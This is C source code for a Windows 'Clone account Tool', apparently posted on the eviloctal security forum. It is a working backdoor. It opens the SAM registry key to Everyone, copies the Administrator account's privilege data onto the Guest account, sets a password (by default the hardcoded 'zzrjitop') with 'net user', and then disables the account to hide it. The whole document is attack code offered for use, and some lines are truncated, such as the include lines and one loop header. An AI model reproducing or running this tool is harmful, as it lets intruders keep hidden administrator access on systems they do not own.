文章作者:zhouzhen[E.S.T]
信息来源:邪恶八进制信息安全团队
#include
#include
#include
#include
#include
#pragma comment (lib,"Advapi32.lib")
#define MAX_KEY_LENGTH 255
#define MAX_VALUE_NAME 16383
DWORD user_flag = 0;
TCHAR cloneUser[1024];
void QueryKey(HKEY hKey);
void banner();
void text_color(WORD color)
{
HANDLE console = GetStdHandle(STD_OUTPUT_HANDLE);
SetConsoleTextAttribute(console, color);
}
int main(int argc, char **argv)
{
DWORD dwRet;
LPSTR SamName = _T("MACHINE\SAM\SAM");
PSECURITY_DESCRIPTOR pSD = NULL;
PACL pOldDacl = NULL;
PACL pNewDacl = NULL;
EXPLICIT_ACCESS ea;
HKEY hKey = NULL;
LPBYTE lpDataF=NULL;
HKEY cKey, uKey;
DWORD Type=REG_BINARY,SizeF=1024*2;
TCHAR command[1024];
TCHAR command1[1024];
int ret;
// 初始化变量
lpDataF = (LPBYTE) malloc(1024*2);
ZeroMemory(lpDataF,1024*2);
// 显示作者和相关信息
banner();
// 获取SAM主键的DACL
dwRet = GetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, &pOldDacl, NULL, &pSD);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T("Set Privilege (1) Error: %d"), dwRet);
text_color(12);
_tprintf(_T("[Fail]
"));
text_color(7);
goto FreeAndExit;
}
// 创建一个ACE,允许Everyone完全控制对象,并允许子对象继承此权限
ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
BuildExplicitAccessWithName(&ea, _T("Everyone"), KEY_ALL_ACCESS, SET_ACCESS,
SUB_CONTAINERS_AND_OBJECTS_INHERIT);
// 将新的ACE加入DACL
dwRet = SetEntriesInAcl(1, &ea, pOldDacl, &pNewDacl);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T("Set Privilege (2) Error: %d"), dwRet);
text_color(12);
_tprintf(_T("[Fail]
"));
text_color(7);
goto FreeAndExit;
}
// 更新SAM主键的DACL
dwRet = SetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, pNewDacl, NULL);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T("Set Privilege (3) Error: %d"), dwRet);
text_color(12);
_tprintf(_T("[Fail]
"));
text_color(7);
goto FreeAndExit;
}
_tprintf(_T("[+]Set Privilege.."));
text_color(10);
_tprintf(_T("[OK]
"));
text_color(7);
// 枚举用户
dwRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, _T("SAM\SAM\Domains\Account\Users\Names"),0, KEY_ALL_ACCESS,&uKey);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T("RegOpenKeyEx Error: %d"), dwRet);
text_color(12);
_tprintf(_T("[Fail]
"));
text_color(7);
goto FreeAndExit;
}
// 功能函数实现自动判断用户
QueryKey(uKey);
if(user_flag == 0){
text_color(12);
_tprintf(_T("The guest user may be delete!
"));
text_color(7);
exit(0);
}
// 打开SAM的子键 1F4
dwRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, _T("SAM\SAM\Domains\Account\Users\000001F4"),
0, KEY_ALL_ACCESS, &hKey);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T("RegOpenKeyEx Error: %d"), dwRet);
text_color(12);
_tprintf(_T("[Fail]
"));
text_color(7);
goto FreeAndExit;
}
// 获得 1F4 的 F 键值
dwRet = RegQueryValueEx(hKey, _T("F"), NULL, &Type,lpDataF,&SizeF);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T("RegQueryValueEx Error: %d"), dwRet);
text_color(12);
_tprintf(_T("[Fail]
"));
text_color(7);
goto FreeAndExit;
}
// 打开SAM的子键 1F5
dwRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, _T("SAM\SAM\Domains\Account\Users\000001F5"),
0, KEY_ALL_ACCESS, &cKey);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T("RegOpenKeyEx Error: %d"), dwRet);
text_color(12);
_tprintf(_T("[Fail]
"));
text_color(7);
goto FreeAndExit;
}
// clone
dwRet = RegSetValueEx(cKey,_T("F"),0, REG_BINARY,lpDataF,SizeF);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T("RegSetValueEx Error: %d"), dwRet);
text_color(12);
_tprintf(_T("[Fail]
"));
text_color(7);
goto FreeAndExit;
}
text_color(7);
_tprintf(_T("[+]Clone Successfully.."));
text_color(10);
_tprintf(_T("[OK]
"));
text_color(7);
_tprintf(_T("[+]Try to set user password.."));
text_color(10);
_tprintf(_T("[OK]
"));
text_color(7);
// 禁用用户, 改密码
if(argc == 1)
{
//执行 net user xx pass
_tcscpy(command,_T("net user "));
_tcscat(command,cloneUser);
_tcscat(command, _T(" "));
_tcscat(command, "zzrjitop");
text_color(0);
ret = system(command);
if (ret != 0)
{
text_color(7);
_tprintf(_T("Set password fail..
"));
text_color(12);
_tprintf(_T("
Fail
"));
text_color(7);
exit(5);
}
//执行 net user xx /active:no
_tcscpy(command1,_T("net user "));
_tcscat(command1,cloneUser);
_tcscat(command1,_T(" /active:no"));
// _tprintf(command1);
text_color(0);
ret = system(command1);
if (ret != 0)
{
text_color(7);
_tprintf(_T("Set password fail..
"));
text_color(12);
_tprintf(_T("
Fail
"));
text_color(7);
exit(5);
}
text_color(14);
_tprintf(_T("[+]User: %s Password: zzrjitop
"), cloneUser);
text_color(7);
}
if(argc ==2)
{
_tcscpy(command,_T("net user "));
_tcscat(command,cloneUser);
_tcscat(command, _T(" "));
_tcscat(command, argv[1]);
text_color(0);
ret = system(command);
if (ret != 0)
{
text_color(7);
_tprintf(_T("Set password fail..
"));
text_color(12);
_tprintf(_T("
Fail
"));
text_color(7);
exit(5);
}
//_tprintf("%s",command);
//执行 net user xx /active:no
_tcscpy(command1,_T("net user "));
_tcscat(command1,cloneUser);
_tcscat(command1,_T(" /active:no"));
text_color(0);
ret = system(command1);
if (ret != 0)
{
text_color(7);
_tprintf(_T("Set password fail..
"));
text_color(12);
_tprintf(_T("
Fail
"));
text_color(7);
exit(5);
}
text_color(14);
_tprintf(_T("[+]
User: %s Password: %s
"), cloneUser, argv[1]);
text_color(7);
}
goto FreeAndExit;
FreeAndExit:
if (hKey) RegCloseKey(hKey);
if (pNewDacl) LocalFree(pNewDacl);
// 还原SAM主键的DACL
if (pOldDacl) dwRet = SetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, pOldDacl, NULL);
if (pSD) LocalFree(pSD);
return 0;
}
void QueryKey(HKEY hKey)
{
TCHAR achKey[MAX_KEY_LENGTH]; // buffer for subkey name
DWORD cbName; // size of name string
TCHAR achClass[MAX_PATH] = TEXT(""); // buffer for class name
DWORD cchClassName = MAX_PATH; // size of class string
DWORD cSubKeys=0; // number of subkeys
DWORD cbMaxSubKey; // longest subkey size
DWORD cchMaxClass; // longest class string
DWORD cValues=0; // number of values for key
DWORD cchMaxValue; // longest value name
DWORD cbMaxValueData; // longest value data
DWORD cbSecurityDescriptor; // size of security descriptor
FILETIME ftLastWriteTime; // last write time
DWORD type = REG_BINARY, Size=1024*2;
LPBYTE lpData=NULL;
DWORD i, retCode;
HKEY tKey;
DWORD cchValue = MAX_VALUE_NAME;
TCHAR fulPath[] =_T("SAM\SAM\Domains\Account\Users\Names\");
TCHAR temp[MAX_VALUE_NAME];
ZeroMemory(cloneUser,1024);
// Get the class name and the value count.
retCode = RegQueryInfoKey(
hKey, // key handle
achClass, // buffer for class name
&cchClassName, // size of class string
NULL, // reserved
&cSubKeys, // number of subkeys
&cbMaxSubKey, // longest subkey size
&cchMaxClass, // longest class string
&cValues, // number of values for this key
&cchMaxValue, // longest value name
&cbMaxValueData, // longest value data
&cbSecurityDescriptor, // security descriptor
&ftLastWriteTime); // last write time
// Enumerate the subkeys, until RegEnumKeyEx fails.
if (cSubKeys)
{
//printf( "
Number of subkeys: %d
", cSubKeys);
for (i=0; i
{
cbName = MAX_KEY_LENGTH;
retCode = RegEnumKeyEx(hKey, i,
achKey,
&cbName,
NULL,
NULL,
NULL,
&ftLastWriteTime);
if (retCode == ERROR_SUCCESS)
{
//_tprintf(TEXT("(%d) %s
"), i+1, achKey);
ZeroMemory(temp,sizeof(temp));
_tcscpy(temp, fulPath);
_tcscat(temp,achKey);
//_tprintf(_T("%s
"), temp);
retCode = RegOpenKeyEx(HKEY_LOCAL_MACHINE, temp, 0, KEY_ALL_ACCESS,&tKey);
if (retCode != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T("RegOpenKeyEx Error: %d"), retCode);
text_color(12);
_tprintf(_T("[Fail]
"));
text_color(7);
exit(0);
}
lpData = (LPBYTE)malloc(2*1024);
ZeroMemory(lpData,2*1024);
retCode = RegQueryValueEx(tKey, NULL, NULL, &type, lpData,&Size);
if (retCode != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T("RegQueryValueEx Error: %d"), retCode);
text_color(12);
_tprintf(_T("[Fail]
"));
text_color(7);
if(tKey) RegCloseKey(tKey);
exit(1);
}
if(type==0x1f5) {
text_color(7);
_tprintf(_T("[+]Starting clone %s.."), achKey);
text_color(10);
_tprintf(_T("[OK]
"));
text_color(7);
_tcscpy(cloneUser,achKey);
user_flag = 1;
break;
}
}
}
}
// Enumerate the key values.
}
void banner(){
_tprintf(_T("******************************************************
"));
_tprintf(_T("* Clone account Tool http://www.eviloctal.com
"));
_tprintf(_T("* Clone the 1F5 user
"));
_tprintf(_T("* Usage: clone.exe or clone.exe pass
"));
_tprintf(_T("*"));
text_color(12);
_tprintf(_T(" If clone successfully it was made by zz[E.S.t]
"));
text_color(7);
_tprintf(_T("******************************************************
"));
}
420
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
